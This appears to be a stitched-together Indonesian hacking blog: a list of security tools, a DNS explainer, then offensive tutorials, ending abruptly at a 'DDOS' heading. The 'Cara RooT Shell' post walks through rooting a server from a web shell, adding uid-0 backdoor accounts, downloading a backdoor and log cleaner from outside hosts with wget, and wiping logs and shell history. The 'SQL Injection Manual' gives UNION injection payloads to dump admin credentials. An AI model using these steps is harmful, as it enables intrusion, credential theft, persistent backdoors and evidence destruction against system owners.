Jumat, 17 Juni 2011

10 Best Hacking and Security Software Tools

1. John the Ripper

John the Ripper is a free password cracking software tool initially developed for the UNIX operating system. It is one of the most popular password testing/breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL and others.


2. Nmap

Nmap is my favorite network security scanner. It is used to discover computers and services on a computer network, thus creating a "map" of the network. Just like many simple port scanners, Nmap is capable of discovering passive services on a network despite the fact that such services aren't advertising themselves with a service discovery protocol. In addition Nmap may be able to determine various details about the remote computers. These include operating system, device type, uptime, software product used to run a service, exact version number of that product, presence of some firewall techniques and, on a local area network, even vendor of the remote network card.

Nmap runs on Linux, Microsoft Windows, Solaris, and BSD (including Mac OS X), and also on AmigaOS. Linux is the most popular nmap platform and Windows the second most popular.




3. Nessus

Nessus is a comprehensive vulnerability scanning software. Its goal is to detect potential vulnerabilities on the tested systems such as:

-Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
-Misconfiguration (e.g. open mail relay, missing patches, etc).
-Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
-Denials of service against the TCP/IP stack by using mangled packets

Nessus is the world's most popular vulnerability scanner, estimated to be used by over 75,000 organizations worldwide. It took first place in the 2000, 2003, and 2006 security tools survey from SecTools.Org.



4. chkrootkit

chkrootkit (Check Rootkit) is a common Unix-based program intended to help system administrators check their system for known rootkits. It is a shell script using common UNIX/Linux tools like the strings and grep commands to search core system programs for signatures and for comparing a traversal of the /proc filesystem with the output of the ps (process status) command to look for discrepancies.

It can be used from a "rescue disc" (typically a Live CD) or it can optionally use an alternative directory from which to run all of its own commands. These techniques allow chkrootkit to trust the commands upon which it depend a bit more.

There are inherent limitations to the reliability of any program that attempts to detect compromises (such as rootkits and computer viruses). Newer rootkits may specifically attempt to detect and compromise copies of the chkrootkit programs or take other measures to evade detection by them.



5. Wireshark

Wireshark is a free packet sniffer computer application used for network troubleshooting, analysis, software and communications protocol development, and education. In June 2006, the project was renamed from Ethereal due to trademark issues.

The functionality Wireshark provides is very similar to tcpdump, but it has a GUI front-end, and many more information sorting and filtering options. It allows the user to see all traffic being passed over the network (usually an Ethernet network but support is being added for others) by putting the network interface into promiscuous mode.

Wireshark uses the cross-platform GTK+ widget toolkit, and is cross-platform, running on various computer operating systems including Linux, Mac OS X, and Microsoft Windows. Released under the terms of the GNU General Public License, Wireshark is free software.


6. netcat

netcat is a computer networking utility for reading from and writing to network connections on either TCP or UDP.

Netcat was voted the second most useful network security tool in a 2000 poll conducted by insecure.org on the nmap users mailing list. In 2003, it gained fourth place, a position it also held in the 2006 poll.

The original version of netcat is a UNIX program. Its author is known as *Hobbit*. He released version 1.1 in March of 1996.

Netcat is fully POSIX compatible and there exist several implementations, including a rewrite from scratch known as GNU netcat.



7. Kismet

Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b and 802.11g traffic.

Kismet is unlike most other wireless network detectors in that it works passively. This means that without sending any loggable packets, it is able to detect the presence of both wireless access points and wireless clients, and associate them with each other.

Kismet also includes basic wireless IDS features such as detecting active wireless sniffing programs including NetStumbler, as well as a number of wireless network attacks.



8. hping

hping is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the idle scan scanning technique (also invented by the hping author), and now implemented in the Nmap Security Scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in very short time.

Like most tools used in computer security, hping is useful to both system administrators and crackers (or script kiddies).


9. Snort

Snort is a free and open source Network Intrusion prevention system (NIPS) and network intrusion detection (NIDS) capable of performing packet logging and real-time traffic analysis on IP networks.

Snort performs protocol analysis, content searching/matching, and is commonly used to actively block or passively detect a variety of attacks and probes, such as buffer overflows, stealth port scans, web application attacks, SMB probes, and OS fingerprinting attempts, amongst other features. The software is mostly used for intrusion prevention purposes, by dropping attacks as they are taking place. Snort can be combined with other software such as SnortSnarf, sguil, OSSIM, and the Basic Analysis and Security Engine (BASE) to provide a visual representation of intrusion data. With patches for the Snort source from Bleeding Edge Threats, support for packet stream antivirus scanning with ClamAV and network abnormality with SPADE in network layers 3 and 4 is possible with historical observation.


10. tcpdump

tcpdump is a common computer network debugging tool that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

In some Unix-like operating systems, a user must have superuser privileges to use tcpdump because the packet capturing mechanisms on those systems require elevated privileges. However, the -Z option may be used to drop privileges to a specific unprivileged user after capturing has been set up. In other Unix-like operating systems, the packet capturing mechanism can be configured to allow non-privileged users to use it; if that is done, superuser privileges are not required.

The user may optionally apply a BPF-based filter to limit the number of packets seen by tcpdump; this renders the output more usable on networks with a high volume of traffic.

Sistem Penamaan Domain

DNS (Domain Name System, bahasa Indonesia: Sistem Penamaan Domain) adalah sebuah sistem yang menyimpan informasi tentang nama host maupun nama domain dalam bentuk basis data tersebar (distributed database) di dalam jaringan komputer, misalkan: Internet. DNS menyediakan alamat IP untuk setiap nama host dan mendata setiap server transmisi surat (mail exchange server) yang menerima surat elektronik (email) untuk setiap domain.

DNS menyediakan servis yang cukup penting untuk Internet, bilamana perangkat keras komputer dan jaringan bekerja dengan alamat IP untuk mengerjakan tugas seperti pengalamatan dan penjaluran (routing), manusia pada umumnya lebih memilih untuk menggunakan nama host dan nama domain, contohnya adalah penunjukan sumber universal (URL) dan alamat e-mail. Analogi yang umum digunakan untuk menjelaskan fungsinya adalah DNS bisa dianggap seperti buku telepon internet dimana saat pengguna mengetikkan www.example.com di internet browser maka pengguna akan diarahkan ke alamat IP 192.0.32.10 (IPv4) dan 2620:0:2d0:200::10 (IPv6).

Sejarah singkat DNS

Penggunaan nama sebagai pengabstraksi alamat mesin di sebuah jaringan komputer yang lebih dikenal oleh manusia mengalahkan TCP/IP, dan kembali ke zaman ARPAnet. Dahulu, setiap komputer di jaringan komputer menggunakan file HOSTS.TXT dari SRI (sekarang SIR International), yang memetakan sebuah alamat ke sebuah nama (secara teknis, file ini masih ada - sebagian besar sistem operasi modern menggunakannya baik secara baku maupun melalui konfigurasi, dapat melihat Hosts file untuk menyamakan sebuah nama host menjadi sebuah alamat IP sebelum melakukan pencarian via DNS). Namun, sistem tersebut diatas mewarisi beberapa keterbatasan yang mencolok dari sisi prasyarat, setiap saat sebuah alamat komputer berubah, setiap sistem yang hendak berhubungan dengan komputer tersebut harus melakukan update terhadap file Hosts.

Dengan berkembangnya jaringan komputer, membutuhkan sistem yang bisa dikembangkan: sebuah sistem yang bisa mengganti alamat host hanya di satu tempat, host lain akan mempelajari perubaha tersebut secara dinamis. Inilah DNS.

Paul Mockapetris menemukan DNS di tahun 1983; spesifikasi asli muncul di RFC 882 dan 883. Tahun 1987, penerbitan RFC 1034 dan RFC 1035 membuat update terhadap spesifikasi DNS. Hal ini membuat RFC 882 dan RFC 883 tidak berlaku lagi. Beberapa RFC terkini telah memproposikan beberapa tambahan dari protokol inti DNS.

Teori bekerja DNS

Para Pemain Inti

Pengelola dari sistem DNS terdiri dari tiga komponen:

  • DNS resolver, sebuah program klien yang berjalan di komputer pengguna, yang membuat permintaan DNS dari program aplikasi.
  • recursive DNS server, yang melakukan pencarian melalui DNS sebagai tanggapan permintaan dari resolver, dan mengembalikan jawaban kepada para resolver tersebut;

dan ...

  • authoritative DNS server yang memberikan jawaban terhadap permintaan dari recursor, baik dalam bentuk sebuah jawaban, maupun dalam bentuk delegasi (misalkan: mereferensikan ke authoritative DNS server lainnya)

Pengertian beberapa bagian dari nama domain

Sebuah nama domain biasanya terdiri dari dua bagian atau lebih (secara teknis disebut label), dipisahkan dengan titik.

  • Label paling kanan menyatakan top-level domain - domain tingkat atas/tinggi (misalkan, alamat www.wikipedia.org memiliki top-level domain org).
  • Setiap label di sebelah kirinya menyatakan sebuah sub-divisi atau subdomain dari domain yang lebih tinggi. Catatan: "subdomain" menyatakan ketergantungan relatif, bukan absolut. Contoh: wikipedia.org merupakan subdomain dari domain org, dan id.wikipedia.org dapat membentuk subdomain dari domain wikipedia.org (pada praktiknya, id.wikipedia.org sesungguhnya mewakili sebuah nama host - lihat dibawah). Secara teori, pembagian seperti ini dapat mencapai kedalaman 127 level, dan setiap label dapat terbentuk sampai dengan 63 karakter, selama total nama domain tidak melebihi panjang 255 karakter. Tetapi secara praktik, beberapa pendaftar nama domain (domain name registry) memiliki batas yang lebih sedikit.
  • Terakhir, bagian paling kiri dari bagian nama domain (biasanya) menyatakan nama host. Sisa dari nama domain menyatakan cara untuk membangun jalur logis untuk informasi yang dibutuhkan; nama host adalah tujuan sebenarnya dari nama sistem yang dicari alamat IP-nya. Contoh: nama domain www.wikipedia.org memiliki nama host "www".

DNS memiliki kumpulan hirarki dari DNS servers. Setiap domain atau subdomain memiliki satu atau lebih authoritative DNS Servers (server DNS otorisatif) yang mempublikasikan informas tentang domain tersebut dan nama-nama server dari setiap domain di-"bawah"-nya. Pada puncak hirarki, terdapat root servers- induk server nama: server yang ditanyakan ketika mencari (menyelesaikan/resolving) dari sebuah nama domain tertinggi (top-level domain).

Sebuah contoh dari teori rekursif DNS

Sebuah contoh mungkin dapat memperjelas proses ini. Andaikan ada aplikasi yang memerlukan pencarian alamat IP dari www.wikipedia.org. Aplikasi tersebut bertanya ke DNS recursor lokal.

  • Sebelum dimulai, recursor harus mengetahui dimana dapat menemukan root nameserver; administrator dari recursive DNS server secara manual mengatur (dan melakukan update secara berkala) sebuah file dengan nama root hints zone (panduan akar DNS) yang menyatakan alamat-alamt IP dari para server tersebut.
  • Proses dimulai oleh recursor yang bertanya kepada para root server tersebut - misalkan: server dengan alamat IP "198.41.0.4" - pertanyaan "apakah alamat IP dari www.wikipedia.org?"
  • Root server menjawab dengan sebuah delegasi, arti kasarnya: "Saya tidak tahu alamat IP dari www.wikipedia.org, tapi saya "tahu" bahwa server DNS di 204.74.112.1 memiliki informasi tentang domain org."
  • Recursor DNS lokal kemudian bertanya kepada server DNS (yaitu: 204.74.112.1) pertanyaan yang sama seperti yang diberikan kepada root server. "apa alamat IP dari www.wikipedia.org?". (umumnya) akan didapatkan jawaban yang sejenis, "saya tidak tahu alamat dari www.wikipedia.org, tapi saya "tahu" bahwa server 207.142.131.234 memiliki informasi dari domain wikipedia.org."
  • Akhirnya, pertanyaan beralih kepada server DNS ketiga (207.142.131.234), yang menjawab dengan alamat IP yang dibutuhkan.

Proses ini menggunakan pencarian rekursif (recursion / recursive searching).

Pengertian pendaftaran domain dan glue records

Membaca contoh diatas, Anda mungkin bertanya: "bagaimana caranya DNS server 204.74.112.1 tahu alamat IP mana yang diberikan untuk domain wikipedia.org?" Pada awal proses, kita mencatat bahwa sebuah DNS recursor memiliki alamat IP dari para root server yang (kurang-lebih) didata secara explisit (hard coded). Mirip dengan hal tersebut, server nama (name server) yang otoritatif untuk top-level domain mengalami perubahan yang jarang.

Namun, server nama yang memberikan jawaban otorisatif bagi nama domain yang umum mengalami perubahan yang cukup sering. Sebagai bagian dari proses pendaftaran sebuah nama domain (dan beberapa waktu sesudahnya), pendaftar memberikan pendaftaran dengan server nama yang akan mengotorisasikan nama domain tersebut; maka ketika mendaftar wikipedia.org, domain tersebut terhubung dengan server nama gunther.bomis.com dan zwinger.wikipedia.org di pendaftar .org. Kemudian, dari contoh di atas, ketika server dikenali sebagai 204.74.112.1 menerima sebuah permintaan, DNS server memindai daftar domain yang ada, mencari wikipedia.org, dan mengembalikan server nama yang terhubung dengan domain tersebut.

Biasanya, server nama muncul berdasarkan urutan nama, selain berdasarkan alamat IP. Hal ini menimbulkan string lain dari permintaan DNS untuk menyelesaikan nama dari server nama; ketika sebuah alamat IP dari server nama mendapatkan sebuah pendaftaran di zona induk, para programmer jaringan komputer menamakannya sebuah glue record (daftar lekat???)

DNS dalam praktik

Ketika sebuah aplikasi (misalkan web broswer), hendak mencari alamat IP dari sebuah nama domain, aplikasi tersebut tidak harus mengikuti seluruh langkah yang disebutkan dalam teori diatas. Kita akan melihat dulu konsep caching, lalu mengertikan operasi DNS di "dunia nyata".

Caching dan masa hidup (caching and time to live)

Karena jumlah permintaan yang besar dari sistem seperti DNS, perancang DNS menginginkan penyediaan mekanisme yang bisa mengurangi beban dari masing-masing server DNS. Rencana mekanisnya menyarankan bahwa ketika sebuah DNS resolver (klien) menerima sebuah jawaban DNS, informasi tersebut akan di cache untuk jangka waktu tertentu. Sebuah nilai (yang di-set oleh administrator dari server DNS yang memberikan jawaban) menyebutnya sebagai time to live (masa hidup), atau TTL yang mendefinisikan periode tersebut. Saat jawaban masuk ke dalam cache, resolver akan mengacu kepada jawaban yang disimpan di cache tersebut; hanya ketika TTL usai (atau saat administrator mengosongkan jawaban dari memori resolver secara manual) maka resolver menghubungi server DNS untuk informasi yang sama.

Waktu propagasi (propagation time)

Satu akibat penting dari arsitektur tersebar dan cache adalah perubahan kepada suatu DNS tidak selalu efektif secara langsung dalam skala besar/global. Contoh berikut mungkin akan menjelaskannya: Jika seorang administrator telah mengatur TTL selama 6 jam untuk host www.wikipedia.org, kemudian mengganti alamat IP dari www.wikipedia.org pada pk 12:01, administrator harus mempertimbangkan bahwa ada (paling tidak) satu individu yang menyimpan cache jawaban dengan nilai lama pada pk 12:00 yang tidak akan menghubungi server DNS sampai dengan pk 18:00. Periode antara pk 12:00 dan pk 18:00 dalam contoh ini disebut sebagai waktu propagasi (propagation time), yang bisa didefiniskan sebagai periode waktu yang berawal antara saat terjadi perubahan dari data DNS, dan berakhir sesudah waktu maksimum yang telah ditentukan oleh TTL berlalu. Ini akan mengarahkan kepada pertimbangan logis yang penting ketika membuat perubahan kepada DNS: tidak semua akan melihat hal yang sama seperti yang Anda lihat. RFC1537 dapat membantu penjelasan ini.

DNS di dunia nyata

Di dunia nyata, user tidak berhadapan langsung dengan DNS resolver - mereka berhadapan dengan program seperti web brower (Mozilla Firefox, Safari, Opera, Internet Explorer, Netscape, Konqueror dan lain-lain dan klien mail (Outlook Express, Mozilla Thunderbird dan lain-lain). Ketika user melakukan aktivitas yang meminta pencarian DNS (umumnya, nyaris semua aktivitas yang menggunakan Internet), program tersebut mengirimkan permintaan ke DNS Resolver yang ada di dalam sistem operasi.

DNS resolver akan selalu memiliki cache (lihat diatas) yang memiliki isi pencarian terakhir. Jika cache dapat memberikan jawaban kepada permintaan DNS, resolver akan menggunakan nilai yang ada di dalam cache kepada program yang memerlukan. Kalau cache tidak memiliki jawabannya, resolver akan mengirimkan permintaan ke server DNS tertentu. Untuk kebanyakan pengguna di rumah, Internet Service Provider(ISP) yang menghubungkan komputer tersebut biasanya akan menyediakan server DNS: pengguna tersebut akan mendata alamat server secara manual atau menggunakan DHCP untuk melakukan pendataan tersebut. Namun jika administrator sistem / pengguna telah mengkonfigurasi sistem untuk menggunakan server DNS selain yang diberikan secara default oleh ISP misalnya seperti Google Public DNS ataupun OpenDNS[1], maka DNS resolver akan mengacu ke DNS server yang sudah ditentukan. Server nama ini akan mengikuti proses yang disebutkan di Teori DNS, baik mereka menemukan jawabannya maupun tidak. Hasil pencarian akan diberikan kepada DNS resolver; diasumsikan telah ditemukan jawaban, resolver akan menyimpan hasilnya di cache untuk penggunaan berikutnya, dan memberikan hasilnya kepada software yang meminta pencarian DNS tersebut.

Sebagai bagian akhir dari kerumitan ini, beberapa aplikasi seperti web browser juga memiliki DNS cache mereka sendiri, tujuannya adalah untuk mengurangi penggunaan referensi DNS resolver, yang akan meningkatkan kesulitan untuk melakukan debug DNS, yang menimbulkan kerancuan data yang lebih akurat. Cache seperti ini umumnya memiliki masa yang singkat dalam hitungan 1 menit.

Penerapan DNS lainnya

Sistem yang dijabarkan diatas memberikan skenario yang disederhanakan. DNS meliputi beberapa fungsi lainnya:

  • Nama host dan alamat IP tidak berarti terhubung secara satu-banding-satu. Banyak nama host yang diwakili melalui alamat IP tunggal: gabungan dengan pengasuhan maya (virtual hosting), hal ini memungkinkan satu komputer untuk malayani beberapa situs web. Selain itu, sebuah nama host dapat mewakili beberapa alamat IP: ini akan membantu toleransi kesalahan (fault tolerance dan penyebaran beban (load distribution), juga membantu suatu situs berpindah dari satu lokasi fisik ke lokasi fisik lainnya secara mudah.
  • Ada cukup banyak kegunaan DNS selain menerjemahkan nama ke alamat IP. Contoh:, agen pemindahan surat Mail transfer agents(MTA) menggunakan DNS untuk mencari tujuan pengiriman E-mail untuk alamat tertentu. Domain yang menginformasikan pemetaan exchange disediakan melalui rekod MX (MX record) yang meningkatkan lapisan tambahan untuk toleransi kesalahan dan penyebaran beban selain dari fungsi pemetaan nama ke alamat IP.
  • Kerangka Peraturan Pengiriman (Sender Policy Framework) secara kontroversi menggunakan keuntungan jenis rekod DNS, dikenal sebagai rekod TXT.
  • Menyediakan keluwesan untuk kegagalan komputer, beberapa server DNS memberikan perlindungan untuk setiap domain. Tepatnya, tigabelas server akar (root servers) digunakan oleh seluruh dunia. Program DNS maupun sistem operasi memiliki alamat IP dari seluruh server ini. Amerika Serikat memiliki, secara angka, semua kecuali tiga dari server akar tersebut. Namun, dikarenakan banyak server akar menerapkan anycast, yang memungkinkan beberapa komputer yang berbeda dapat berbagi alamat IP yang sama untuk mengirimkan satu jenis services melalui area geografis yang luas, banyak server yang secara fisik (bukan sekedar angka) terletak di luar Amerika Serikat.

DNS menggunanakn TCP dan UDP di port komputer 53 untuk melayani permintaan DNS. Nyaris semua permintaan DNS berisi permintaan UDP tunggal dari klien yang dikuti oleh jawaban UDP tunggal dari server. Umumnya TCP ikut terlibat hanya ketika ukuran data jawaban melebihi 512 byte, atau untuk pertukaaran zona DNS zone transfer

Jenis-jenis catatan DNS

Beberapa kelompok penting dari data yang disimpan di dalam DNS adalah sebagai berikut:

  • A record atau catatan alamat memetakan sebuah nama host ke alamat IP 32-bit (untuk IPv4).
  • AAAA record atau catatan alamat IPv6 memetakan sebuah nama host ke alamat IP 128-bit (untuk IPv6).
  • CNAME record atau catatan nama kanonik membuat alias untuk nama domain. Domain yang di-alias-kan memiliki seluruh subdomain dan rekod DNS seperti aslinya.
  • [MX record]]' atau catatan pertukaran surat memetakan sebuah nama domain ke dalam daftar mail exchange server untuk domain tersebut.
  • PTR record atau catatan penunjuk memetakan sebuah nama host ke nama kanonik untuk host tersebut. Pembuatan rekod PTR untuk sebuah nama host di dalam domain in-addr.arpa yang mewakili sebuah alamat IP menerapkan pencarian balik DNS (reverse DNS lookup) untuk alamat tersebut. Contohnya (saat penulisan / penerjemahan artikel ini), www.icann.net memiliki alamat IP 192.0.34.164, tetapi sebuah rekod PTR memetakan ,,164.34.0.192.in-addr.arpa ke nama kanoniknya: referrals.icann.org.
  • NS record atau catatan server nama memetakan sebuah nama domain ke dalam satu daftar dari server DNS untuk domain tersebut. Pewakilan bergantung kepada rekod NS.
  • SOA record atau catatan otoritas awal (Start of Authority) mengacu server DNS yang mengediakan otorisasi informasi tentang sebuah domain Internet.
  • SRV record adalah catatan lokasi secara umum.
  • Catatan TXT mengijinkan administrator untuk memasukan data acak ke dalam catatan DNS; catatan ini juga digunakan di spesifikasi Sender Policy Framework.

Jenis catatan lainnya semata-mata untuk penyediaan informasi (contohnya, catatan LOC memberikan letak lokasi fisik dari sebuah host, atau data ujicoba (misalkan, catatan WKS memberikan sebuah daftar dari server yang memberikan servis yang dikenal (well-known service) seperti HTTP atau POP3 untuk sebuah domain.

Nama domain yang diinternasionalkan

Nama domain harus menggunakan satu sub-kumpulan dari karakter ASCII, hal ini mencegah beberapa bahasa untuk menggunakan nama maupun kata lokal mereka. ICANN telah menyetujui Punycode yang berbasiskan sistem IDNA, yang memetakan string Unicode ke karakter set yang valid untuk DNS, sebagai bentuk penyelesaian untuk masalah ini, dan beberapa registries sudah mengadopsi metode IDNS ini.

Perangkat lunak DNS

Beberapa jenis perangakat lunak DNS menerapkan metode DNS, beberapa diantaranya:

Utiliti berorientasi DNS termasuk:

  • dig (the domain information groper)

Pengguna legal dari domain

Pendaftar (registrant)

Tidak satupun individu di dunia yang "memiliki" nama domain kecuali Network Information Centre (NIC), atau pendaftar nama domain (domain name registry). Sebagian besar dari NIC di dunia menerima biaya tahunan dari para pengguna legal dengan tujuan bagi si pengguna legal menggunakan nama domain tersebut. Jadi sejenis perjanjian sewa-menyewa terjadi, bergantung kepada syarat dan ketentuan pendaftar. Bergantung kepada beberpa peraturan penamaan dari para pendaftar, pengguna legal dikenal sebagai "pendaftar" (registrants) atau sebagai "pemegang domain" (domain holders)

ICANN memegang daftar lengkap untuk pendaftar domain di seluruh dunia. Siapapun dapat menemukan pengguna legal dari sebuah domain dengan mencari melalui basis data WHOIS yang disimpan oleh beberpa pendaftar domain.

Di (lebih kurang) 240 country code top-level domains (ccTLDs), pendaftar domain memegang sebuah acuan WHOIS (pendaftar dan nama server). Contohnya, IDNIC, NIC Indonesia, memegang informasi otorisatif WHOIS untuk nama domain .ID.

Namun, beberapa pendaftar domain, seperti VeriSign, menggunakan model pendaftar-pengguna. Untuk nama domain .COM dan .NET, pendaftar domain, VeriSign memegang informasi dasar WHOIS )pemegang domain dan server nama). Siapapun dapat mencari detil WHOIS (Pemegang domain, server nama, tanggal berlaku, dan lain sebagainya) melalui pendaftar.

Sejak sekitar 2001, kebanyakan pendaftar gTLD (.ORG, .BIZ, .INFO) telah mengadopsi metode penfatar "tebal", menyimpan otoritatif WHOIS di beberapa pendaftar dan bukan pendaftar itu saja.

Kontak Administratif (Administrative Contact)

Satu pemegang domain biasanya menunjuk kontak administratif untuk menangani nama domain. Fungsi manajemen didelegasikan ke kontak administratif yang mencakup (diantaranya):

  • keharusan untuk mengikuti syarat dari pendaftar domain dengan tujuan memiliki hak untuk menggunakan nama domain
  • otorisasi untuk melakukan update ke alamat fisik, alamat email dan nomor telepon dan lain sebagainya via WHOIS

Kontak Teknis (Technical Contact)

Satu kontak teknis menangani server nama dari sebuah nama domain. Beberapa dari banyak fungsi kontak teknis termasuk:

  • memastikan bahwa konfigurasi dari nama domain mengikuti syarat dari pendaftar domain
  • update zona domain
  • menyediakan fungsi 24x7 untuk ke server nama (yang membuat nama domain bisa diaksesKontak Pembayaran (Billing Contact)

Tidak perlu dijelaskan, pihak ini adalah yang menerima tagihan dari NIC.

Server Nama (Name Servers)

Disebut sebagai server nama otoritatif yang mengasuh zona nama domain dari sebuah nama domain.


Sumber : http://www.cimpli.uni.cc/2011/05/sistem-penamaan-domain.html

Senin, 13 Juni 2011

Cara RooT Shell

Assalamualaikum...
tutorial kali saya akan membahasa cara root sebuah shell, sebenarnya sih cara root shell sih gampang nah berikut caranya :

  1. Pertama Masuk ke c99 kita siapin nc dlo di kompi nah hbs tuh kita backconnect kalo udh berhasil maka akan keluar shell di cmd windows atau linux kita [ kalau kita udh punya akses shell tanpa melalui web lansung aja ke tahap 2 ]
  2. setelah ituh kita cukup menanam local root exploit
  3. kemudian kita cukup melakukan perintah
gcc rooter file-localroot
misalnya nama local root exploit kita kernel.2.6.35
gcc rooter kernel.2.6.35
habis perintah itu kita cukup memasukan perintah
./rooter
klo udh klo ada respone kita ketik di cmd window kita tadi whoiam atau id
maka akan keluar
uid=0(root) gid=0(root) groups=50(ftp)

selanjutnya kita :

Add login akses root anda
----------------------------------------------------------------

1. Cara I

(bukan utk redhat 7.2)
/usr/sbin/useradd rampok -u 0 -d /

passwd -d rampok
passwd rampok

su rampok <<--------untuk super user

2. Cara II

kalo mau dapet acces root ketik :

/usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit
abis itu ketik lagi
passwd crit

wuasu666

Kemudian Add User untuk login shell anda

/usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html
passwd html
fuck666 2X

---> Pasang backdor ke shell baru anda guna menjaga kemungkinan yg tidak di inginkan

wget www.utay-doyan.cc/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4
./setup pass yang dimau port yang dimau

contoh : --> ./setup wuasu 7000
cd /

wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install

Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak

rm -rf cleaner.tgz

rm -rf shv4.tar.gz

-*------*-

---> Hapus jejak ngeroot anda ketik perintah berikut:

rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /devory
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
ctrl d

sumber :
hn-team.co.cc

Minggu, 12 Juni 2011

SQL Injection Manual

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
step Satu
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
step Dua
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
step Tiga
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
step Empat
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
Step Lima
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
Step Enam
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--

============
Step Tujuh
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
Step Delapan
==============

tahap terakhir mencari halam admin atau login . biasanya saya disni memkai adminfinder

Sumber : http://www.hn-team.co.cc/2009/10/my-sql.html
Thank to Up aka Deden Ramadhan GobeL

Beberpa istilah di dalam Hacking

SQL Injection

  • injeksi kode teknik yang mengeksploitasi kerentanan keamanan yang terjadi pada lapisan aplikasi database. kerentanan ini hadir ketika masukan pengguna baik salah disaring untuk lolos karakter string literal tertanam dalam pernyataan SQL atau masukan pengguna tidak strongly typed dan dengan demikian tak terduga dieksekusi. Ini adalah sebuah instance dari kelas yang lebih umum dari kerentanan yang dapat terjadi kapan pun salah satu bahasa pemrograman atau scripting adalah tertanam dalam lainnya. serangan injeksi SQL juga dikenal sebagai serangan penyisipan SQL
DDOS [ Distributed Denial of Service ]

